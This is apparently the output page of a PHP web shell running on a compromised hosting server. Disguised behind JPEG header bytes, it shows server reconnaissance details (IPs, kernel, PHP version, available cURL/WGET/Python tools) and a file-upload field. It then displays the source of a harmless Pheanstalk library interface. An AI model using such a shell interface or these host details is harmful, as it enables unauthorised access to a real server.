����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 216.73.216.168 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/www/vendor/pda/pheanstalk/src/Contract/ |
Upload File : |
<?php namespace Pheanstalk\Contract; /** * A response from the beanstalkd server. * * @author Paul Annesley */ interface ResponseInterface extends \ArrayAccess, \Traversable { // global error responses const RESPONSE_OUT_OF_MEMORY = 'OUT_OF_MEMORY'; const RESPONSE_INTERNAL_ERROR = 'INTERNAL_ERROR'; const RESPONSE_DRAINING = 'DRAINING'; const RESPONSE_BAD_FORMAT = 'BAD_FORMAT'; const RESPONSE_UNKNOWN_COMMAND = 'UNKNOWN_COMMAND'; // command responses const RESPONSE_INSERTED = 'INSERTED'; const RESPONSE_BURIED = 'BURIED'; const RESPONSE_EXPECTED_CRLF = 'EXPECTED_CRLF'; const RESPONSE_JOB_TOO_BIG = 'JOB_TOO_BIG'; const RESPONSE_USING = 'USING'; const RESPONSE_DEADLINE_SOON = 'DEADLINE_SOON'; const RESPONSE_RESERVED = 'RESERVED'; const RESPONSE_DELETED = 'DELETED'; const RESPONSE_NOT_FOUND = 'NOT_FOUND'; const RESPONSE_RELEASED = 'RELEASED'; const RESPONSE_WATCHING = 'WATCHING'; const RESPONSE_NOT_IGNORED = 'NOT_IGNORED'; const RESPONSE_FOUND = 'FOUND'; const RESPONSE_KICKED = 'KICKED'; const RESPONSE_OK = 'OK'; const RESPONSE_TIMED_OUT = 'TIMED_OUT'; const RESPONSE_TOUCHED = 'TOUCHED'; const RESPONSE_PAUSED = 'PAUSED'; /** * The name of the response. * @return string */ public function getResponseName(): string; }